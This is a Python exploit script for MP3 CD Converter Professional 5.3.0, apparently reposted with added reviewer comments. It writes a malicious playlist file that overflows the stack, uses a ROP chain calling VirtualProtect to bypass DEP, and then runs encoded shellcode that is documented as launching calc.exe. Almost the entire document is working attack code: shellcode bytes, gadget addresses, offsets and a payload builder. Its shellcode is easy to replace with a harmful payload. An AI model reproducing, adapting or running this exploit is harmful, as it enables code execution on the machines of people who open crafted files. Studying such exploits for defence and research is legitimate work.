
MP3 CD Converter Professional 5.3.0 Overflow

Posted on 12 August 2011

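#!/usr/bin/python
#
# [+] Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit
# [+] Date: 1182011 (as published)
# [+] Author: C4SS!0 G0M3S
# [+] Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
# [+] Version: 5.3.0
# [+] Tested On: WIN-XP SP3 Brazilian Portuguese
# [+] CVE: N/A
#
# Proof of concept.  Running the script writes "Exploit.pls" into the current
# directory.  When the vulnerable build opens that playlist the oversized
# contents overwrite a saved return address with a stack-pivot gadget; a ROP
# chain then calls VirtualProtect() to make the stack executable (the DEP
# bypass) and execution lands on the encoded shellcode, which the original
# author documents as WinExec("calc.exe").
#
# Reviewer caveats (not stated in the original listing):
#   * Every gadget is a fixed address in the main executable (0x004xxxxx) or a
#     0x10000000-based module, so the chain assumes no ASLR (XP era) and this
#     exact 5.3.0 build; any other build or a relocated module breaks it.
#   * The ROP addresses contain 0x00 bytes while the shellcode annotation lists
#     \x00 and \x3d as bad characters, so that restriction evidently applies to
#     the encoded shellcode only -- confirm against the parser before reusing
#     these offsets.
#   * 0x01E5225F (JMP DWORD PTR [EAX]) does not fall in the address ranges the
#     other gadgets use and presumably depends on a stable dynamic layout --
#     verify it on the target.
#   * Gadget semantics in the comments below are the original author's
#     annotations; they were not re-disassembled here.
#   * The payload is assembled from bytes so the script runs on Python 2 or 3.
from struct import pack
from time import sleep
import sys

BANNER = '''
 Created By C4SS!0 G0M3S
 E-mail louredo_@hotmail.com
 Blog net-fuzzer.blogspot.com
'''

# Output written into the current working directory.
OUTPUT_FILE = "Exploit.pls"

# Encoded shellcode (WinExec "Calc.exe"), 223 bytes.  Bad chars: \x00 \x3d.
SHELLCODE = (
    b"\xba\xcb\x38\xf3\xb9\xd9\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9"
    b"\xb1\x32\x83\xef\xfc\x31\x57\x0e\x03\x9c\x36\x11\x4c\xde"
    b"\xaf\x5c\xaf\x1e\x30\x3f\x39\xfb\x01\x6d\x5d\x88\x30\xa1"
    b"\x15\xdc\xb8\x4a\x7b\xf4\x4b\x3e\x54\xfb\xfc\xf5\x82\x32"
    b"\xfc\x3b\x0b\x98\x3e\x5d\xf7\xe2\x12\xbd\xc6\x2d\x67\xbc"
    b"\x0f\x53\x88\xec\xd8\x18\x3b\x01\x6c\x5c\x80\x20\xa2\xeb"
    b"\xb8\x5a\xc7\x2b\x4c\xd1\xc6\x7b\xfd\x6e\x80\x63\x75\x28"
    b"\x31\x92\x5a\x2a\x0d\xdd\xd7\x99\xe5\xdc\x31\xd0\x06\xef"
    b"\x7d\xbf\x38\xc0\x73\xc1\x7d\xe6\x6b\xb4\x75\x15\x11\xcf"
    b"\x4d\x64\xcd\x5a\x50\xce\x86\xfd\xb0\xef\x4b\x9b\x33\xe3"
    b"\x20\xef\x1c\xe7\xb7\x3c\x17\x13\x33\xc3\xf8\x92\x07\xe0"
    b"\xdc\xff\xdc\x89\x45\xa5\xb3\xb6\x96\x01\x6b\x13\xdc\xa3"
    b"\x78\x25\xbf\xa9\x7f\xa7\xc5\x94\x80\xb7\xc5\xb6\xe8\x86"
    b"\x4e\x59\x6e\x17\x85\x1e\x80\x5d\x84\x36\x09\x38\x5c\x0b"
    b"\x54\xbb\x8a\x4f\x61\x38\x3f\x2f\x96\x20\x4a\x2a\xd2\xe6"
    b"\xa6\x46\x4b\x83\xc8\xf5\x6c\x86\xaa\x98\xfe\x4a\x2d"
)


def build_rop_chain():
    """Return the 124-byte ROP chain that calls VirtualProtect on the stack.

    The chain loads the VirtualProtect() arguments into registers and ends
    with PUSHAD # RETN, so the register dump becomes the call frame:
    EDI -> RETN (ROP nop), ESI -> JMP [EAX] with EAX = pointer to
    VirtualProtect, EBP -> PUSH ESP # RETN (the return address, which jumps
    into the now-executable stack), ESP -> lpAddress, EBX -> dwSize,
    EDX -> flNewProtect, ECX -> lpflOldProtect (a stack address captured at
    the start of the chain).  Extra RETN gadgets pad for the "RETN 04"
    gadgets that pop one more dword than usual.
    """
    ret = pack("<L", 0x00425C69)        # RETN (ROP nop / RETN-04 padding)
    chain = ret * 4
    # ECX = a writable stack address, later consumed as lpflOldProtect.
    chain += pack("<L", 0x0045125a)     # PUSH ESP # POP ESI # RETN 04
    chain += ret * 2
    chain += pack("<L", 0x0046194c)     # XCHG EAX,ESI # RETN
    chain += pack("<L", 0x0040d8b1)     # XCHG EAX,ECX # CLD # ADD AL,0 # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,8 # RETN 04
    chain += b"A" * 24                  # junk eaten by the four POPs + ADD ESP,8 above
    chain += ret * 2
    chain += pack("<L", 0x10008d68)     # POP EDI # RETN
    chain += ret                        # EDI = RETN (first thing PUSHAD's frame returns to)
    chain += pack("<L", 0x1000176a)     # POP EBP # RETN
    chain += pack("<L", 0x004319e6)     # EBP = PUSH ESP # RETN -> VirtualProtect return address
    chain += pack("<L", 0x0043017a)     # POP EBX # RET
    chain += pack("<L", 0x00000500)     # EBX = dwSize
    chain += pack("<L", 0x004078f6)     # POP EDX # ADD EAX,4C48300 # POP ESI # RETN
    chain += pack("<L", 0x00000040)     # EDX = flNewProtect (PAGE_EXECUTE_READWRITE)
    chain += b"BBBB"                    # junk for the trailing POP ESI
    chain += pack("<L", 0x0040dc8c)     # POP ESI # RETN
    chain += pack("<L", 0x01E5225F)     # ESI = JMP DWORD PTR DS:[EAX] -> calls VirtualProtect
    chain += pack("<L", 0x00444ad3)     # POP EAX # RETN
    chain += pack("<L", 0x007EC070)     # EAX = pointer to VirtualProtect
    chain += pack("<L", 0x1000734d)     # PUSHAD # RETN
    return chain


def build_payload():
    """Return the full contents of the malicious .pls file (51169 bytes).

    Layout, per the original author's offsets: 16 bytes of filler, a first
    stack pivot at offset 16, filler up to offset 784, a second pivot, 24
    bytes of filler, the ROP chain, a 10-byte NOP sled, the shellcode and
    50000 bytes of trailing filler that guarantees the overflow length.
    """
    payload = b"A" * 16
    payload += pack("<L", 0x00456333)   # ADD ESP,318 # RETN 4
    payload += b"B" * (784 - len(payload))
    payload += pack("<L", 0x004462D0)   # ADD ESP,51C # RETN
    payload += b"A" * 24
    payload += build_rop_chain()
    payload += b"\x90" * 10             # NOP sled
    payload += SHELLCODE
    payload += b"C" * 50000
    return payload


def write_exploit(path=OUTPUT_FILE):
    """Write the payload to *path* and return the number of bytes written.

    Raises IOError (OSError on Python 3) if the file cannot be created; the
    file handle is always closed.
    """
    payload = build_payload()
    with open(path, "wb") as handle:
        handle.write(payload)
    return len(payload)


def main():
    """CLI entry point: print the banner, write Exploit.pls, exit -1 on error."""
    print(BANNER)
    sleep(2)
    print(" [+]Creating Exploit File...")
    sleep(1)
    try:
        write_exploit(OUTPUT_FILE)
        print(' [+]File "Exploit.pls" Created Succefully.')
        sleep(1)
    except IOError as e:
        print(" [+]Error: " + str(e))
        sys.exit(-1)


if __name__ == "__main__":
    main()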

 
